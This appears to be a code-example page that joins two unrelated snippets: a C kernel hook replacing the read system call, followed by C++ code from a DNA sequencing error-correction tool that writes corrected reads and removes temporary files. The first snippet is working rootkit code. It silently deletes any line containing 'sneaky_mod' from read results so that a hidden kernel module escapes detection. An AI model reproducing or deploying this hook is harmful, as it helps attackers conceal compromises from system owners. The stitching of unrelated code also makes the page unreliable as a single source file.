Beispiel #1
0
/*
 * Replacement for the read system call.
 *
 * Forwards the request to original_read() and then, if the bytes that were
 * actually read contain the text "sneaky_mod", removes everything from the
 * start of that match up to and including the next '\n' and shrinks the
 * returned byte count accordingly. Only the first match is handled.
 *
 * fd, buf, count: passed through unchanged to original_read().
 * Returns the (possibly reduced) number of bytes in buf, or the unmodified
 * result of original_read() when it is <= 0, when there is no match, or when
 * no newline follows the match inside the data that was read.
 *
 * All scanning is bounded by the number of bytes read: the buffer is not
 * NUL-terminated, so unbounded string functions must not be used on it.
 *
 * NOTE(review): buf is dereferenced directly, as in the original code. If it
 * is a user-space pointer in the target environment, it should be accessed
 * through the appropriate copy helpers instead - confirm.
 */
asmlinkage ssize_t sneaky_sys_read(int fd, void * buf, size_t count) {
  static const char needle[] = "sneaky_mod";
  const size_t needle_len = sizeof(needle) - 1;
  ssize_t nread = original_read(fd, buf, count);
  char * data = (char *)buf;
  char * head = NULL;
  char * newline;
  size_t len;
  size_t removed;
  size_t i;

  /* Error (negative) or end-of-file (zero): there is no valid data to scan. */
  if (nread <= 0) {
    return nread;
  }
  len = (size_t)nread;

  /* Bounded search for the first occurrence of the needle in data[0, len). */
  for (i = 0; i + needle_len <= len; ++i) {
    if (memcmp(data + i, needle, needle_len) == 0) {
      head = data + i;
      break;
    }
  }
  if (head == NULL) {
    return nread;
  }

  /* The line ends at the first newline after the match, within valid data. */
  newline = (char *)memchr(head, '\n', len - (size_t)(head - data));
  if (newline == NULL) {
    return nread;
  }

  /* Close the gap by moving only the valid bytes that follow the newline. */
  removed = (size_t)(newline - head) + 1;
  memmove(head, newline + 1, len - (size_t)(newline + 1 - data));

  return nread - (ssize_t)removed;
}
//----------------------------------------------------------------------
// Writes corrected reads into a file.
//
// Copies the input read file (member read_file_name) to
// corrected_read_file_name record by record. Each record is handled as
// four lines: header, DNA sequence, "+" line and quality score line.
// The sequence line is upper-cased and every character that is not one
// of the NEOCLEOTIDE symbols is replaced by SUBST_CHAR. Corrections are
// then applied from the binary error correction information files
// (one per chunk, named by get_error_correction_info_file_name()).
// Each information byte is consumed two bits at a time and serves
// BPS_PER_BYTE bases; a non-zero two-bit code is translated by
// decode_correction_info(). Reads whose number of substituted
// characters reaches current_read_length * MAX_N_RATE are written
// upper-cased but otherwise unmodified.
//
// Parameters:
//   c_inst_args                     - not referenced by this function
//   error_correction_info_file_name - prefix of the per-chunk info files
//   corrected_read_file_name        - output file
//   corrected_read_file_type        - file type handed to FileReader
//                                     (only used when USE_FILE_READER
//                                     is defined)
//
// Any failure to open the output or an info file, or an info file that
// is too short, is reported to std::cout and the log stream and ends
// the process with exit(EXIT_FAILURE). If the input read file cannot be
// opened, no records are processed and no error is reported.
//----------------------------------------------------------------------

void C_correct_errors::write_corrected_reads(const C_arg& c_inst_args, const std::string& error_correction_info_file_name, const std::string& corrected_read_file_name, const FileReader::FileType corrected_read_file_type) {
    std::ofstream& f_log = Log::get_stream();

    // NOTE: the two preprocessor branches below each open an "if" block
    // (and later a "while" block) that is closed by the shared code after
    // the matching #endif; keep the braces of both branches in step.
#ifdef USE_FILE_READER
    // open corrected read files
    FileReader f_corrected_read;
    FileReader f_read;
    f_corrected_read.setFileName(corrected_read_file_name, corrected_read_file_type);
    if (!f_corrected_read.openFile(FileReader::WRITE)) {
        std::cout << std::endl << "ERROR: Cannot open " << corrected_read_file_name << std::endl << std::endl;
        f_log << std::endl << "ERROR: Cannot open " << corrected_read_file_name << std::endl << std::endl;
        exit(EXIT_FAILURE);
    }

    // open read files
    f_read.setFileName(read_file_name, corrected_read_file_type);

    // process reads
    if (f_read.openFile(FileReader::READ)) {
#else
    // open corrected read files
    std::ofstream f_corrected_read;
    std::ifstream f_read;
    f_corrected_read.open(corrected_read_file_name.c_str());

    if (f_corrected_read.is_open() == false) {
        std::cout << std::endl << "ERROR: Cannot open " << corrected_read_file_name << std::endl << std::endl;
        f_log << std::endl << "ERROR: Cannot open " << corrected_read_file_name << std::endl << std::endl;
        exit(EXIT_FAILURE);
    }

    // open read files
    f_read.open(read_file_name.c_str());

    // process reads
    if (f_read.is_open()) {
#endif
        // index of the error correction information file currently being read
        std::size_t chunks_it = 0;

        // open error correction information files
        std::ifstream f_error_correction_info;

        f_error_correction_info.open(get_error_correction_info_file_name(error_correction_info_file_name, chunks_it).c_str(), std::ios::binary);

        if (f_error_correction_info.is_open() == false) {
            std::cout << std::endl << "ERROR: Cannot open " << get_error_correction_info_file_name(error_correction_info_file_name, chunks_it) << std::endl << std::endl;
            f_log << std::endl << "ERROR: Cannot open " << get_error_correction_info_file_name(error_correction_info_file_name, chunks_it) << std::endl << std::endl;
            exit(EXIT_FAILURE);
        }

        // scratch buffer for header, "+" and quality score lines
        std::string line;

        // sequence line of the current record
        std::string read;

#ifdef USE_FILE_READER
        // number of bytes for storing reads
        // std::size_t num_byte_per_read;
        // num_byte_per_read = (std::size_t)(ceil((float)(read_length) / BPS_PER_BYTE));

        // std::string modification_buffer(num_byte_per_read, '0');

        // each iteration starts by reading the header line of a record
        while (f_read.getLine(line)) {
            // write the first head lines
            if (line.length() > 0) {
                line += "\n";
                f_corrected_read.putLine(line);
            }
            // DNA sequence
            f_read.getLine(read);
            std::size_t current_read_length = read.length();
#else
        // header
        getline(f_read, line);

        // write the first head lines
        if (line.length() > 0) {
            f_corrected_read << line << "\n";
        }

        // number of bytes for storing reads
        // std::size_t num_byte_per_read;
        // num_byte_per_read = (std::size_t)(ceil((float)(read_length) / BPS_PER_BYTE));

        // std::string modification_buffer(num_byte_per_read, '0');

        // the header of the first record was consumed above; the header of
        // every following record is consumed at the end of the loop body
        while (!f_read.eof()) {
            // DNA sequence
            getline(f_read, read);
            std::size_t current_read_length = read.length();
#endif
            // change sequences to upper case
            transform(read.begin(), read.end(), read.begin(), ::toupper);

            // upper-cased sequence before any character is substituted
            std::string original_read(read);

            // count the characters that are not one of the NEOCLEOTIDE
            // symbols and replace each of them with SUBST_CHAR
            std::size_t number_of_Ns = 0;
            for (std::size_t it = 0; it < current_read_length; ++it) {
                bool is_nucleotide = false;
                for (std::size_t it_nucl = 0; it_nucl < NUM_NEOCLEOTIDE; ++it_nucl) {
                    if (read[it] == NEOCLEOTIDE[it_nucl]) {
                        is_nucleotide = true;
                        break;
                    }
                }
                if (!is_nucleotide) {
                    ++number_of_Ns;
                    read[it] = SUBST_CHAR;
                }
            }

            // reads with too many substituted characters are written without
            // substitutions and without corrections
            const bool too_many_Ns = number_of_Ns >= current_read_length * MAX_N_RATE;

            // modified reads
            std::string read_modified(too_many_Ns ? original_read : read);

            // read modification information from files
            // Zero-initialised: when the information files are exhausted at
            // the end of the input (the tolerated case below) the decoding
            // loop must see a defined value; zero bits mean "no correction".
            char buffer = 0;

            if (!f_error_correction_info.get(buffer)) {
                // the current information file is exhausted: move on to the
                // next chunk
                f_error_correction_info.close();

                ++chunks_it;
                if (chunks_it == n_chunks) {
                    // no information files are left; this is only an error
                    // while the input read file still has data
                    if (!f_read.eof()) {
                        std::cout << std::endl << "ERROR: Unexpected end of error correction info file." << std::endl;
                        f_log << std::endl << "ERROR: Unexpected end of error correction info file." << std::endl;
                        exit(EXIT_FAILURE);
                    }
                }
                else {
                    // open error correction information files
                    f_error_correction_info.open(get_error_correction_info_file_name(error_correction_info_file_name, chunks_it).c_str(), std::ios::binary);

                    if (f_error_correction_info.is_open() == false) {
                        std::cout << std::endl << "ERROR: Cannot open " << get_error_correction_info_file_name(error_correction_info_file_name, chunks_it) << std::endl << std::endl;
                        f_log << std::endl << "ERROR: Cannot open " << get_error_correction_info_file_name(error_correction_info_file_name, chunks_it) << std::endl << std::endl;
                        exit(EXIT_FAILURE);
                    }

                    if (!f_error_correction_info.get(buffer)) {
                        std::cout << std::endl << "ERROR: The file " << get_error_correction_info_file_name(error_correction_info_file_name, chunks_it) << " is empty" << std::endl << std::endl;
                        f_log << std::endl << "ERROR: The file " << get_error_correction_info_file_name(error_correction_info_file_name, chunks_it) << " is empty" << std::endl << std::endl;
                        exit(EXIT_FAILURE);
                    }
                }
            }

            // make new reads
            std::size_t it_mod;
            for (it_mod = 0; it_mod < current_read_length; it_mod++) {
                // take the code of the current base from the bits selected by
                // (BIT8 | 0x40) - presumably the two most significant bits,
                // confirm against the definition of BIT8 - then shift the
                // code of the next base into that position
                unsigned char first_bits = buffer & (BIT8 | 0x40);
                buffer <<= 2;

                if (first_bits != 0 && !too_many_Ns) {
                    read_modified[it_mod] = decode_correction_info(first_bits, read[it_mod]);
                }

                // increment indexes
                // a new byte is fetched after every BPS_PER_BYTE bases,
                // except after the last base of the read: the first byte of
                // the next read is fetched at the top of the outer loop
                if (((it_mod % BPS_PER_BYTE) == (BPS_PER_BYTE - 1)) && (it_mod != (current_read_length - 1))) {
                    if (!f_error_correction_info.get(buffer)) {
                        std::cout << std::endl << "ERROR: The size of " << error_correction_info_file_name << " is wrong" << std::endl << std::endl;
                        f_log << std::endl << "ERROR: The size of " << error_correction_info_file_name << " is wrong" << std::endl << std::endl;
                        exit(EXIT_FAILURE);
                    }
                }
            }
#ifdef USE_FILE_READER
            // write new reads to output files
            read_modified += "\n";
            f_corrected_read.putLine(read_modified);

            // "+"
            f_read.getLine(line);
            line += "\n";
            f_corrected_read.putLine(line);

            // quality score
            f_read.getLine(line);
            line += "\n";
            f_corrected_read.putLine(line);
#else
            // write new reads to output files
            f_corrected_read << read_modified << "\n";

            // "+"
            getline(f_read, line);
            f_corrected_read << line << "\n";

            // quality score
            getline(f_read, line);
            f_corrected_read << line << "\n";

            // header
            getline(f_read, line);

            if (line.length() > 0) {
                f_corrected_read << line << "\n";
            }
#endif
        }
    }

    // close read files
    f_read.close();

    // close corrected reads
    f_corrected_read.close();

    std::cout << "     Writing corrected reads into files: done" << std::endl << std::endl;
    f_log << "     Writing corrected reads into files: done" << std::endl << std::endl;
}



//----------------------------------------------------------------------
// Deletes the temporary error correction information file of every
// chunk (file numbers 0 to n_chunks - 1). The result of each remove()
// call is not checked, and c_inst_args is not used.
//----------------------------------------------------------------------

void C_correct_errors::remove_error_correction_info_files(const C_arg& c_inst_args, const std::string& error_correction_info_file_name) {
    std::size_t chunk_index = 0;

    while (chunk_index < n_chunks) {
        // build the name of this chunk's file, then delete the file
        const std::string chunk_file_name(get_error_correction_info_file_name(error_correction_info_file_name, chunk_index));

        remove(chunk_file_name.c_str());
        ++chunk_index;
    }
}



//----------------------------------------------------------------------
// Builds the name of one temporary error correction information file:
// the given base name immediately followed by the file number.
//----------------------------------------------------------------------

std::string C_correct_errors::get_error_correction_info_file_name(const std::string& error_correction_info_file_name, const std::size_t file_number) const {
    std::ostringstream name_builder;

    // base name first, then the number, with nothing in between
    name_builder << error_correction_info_file_name << file_number;

    return name_builder.str();
}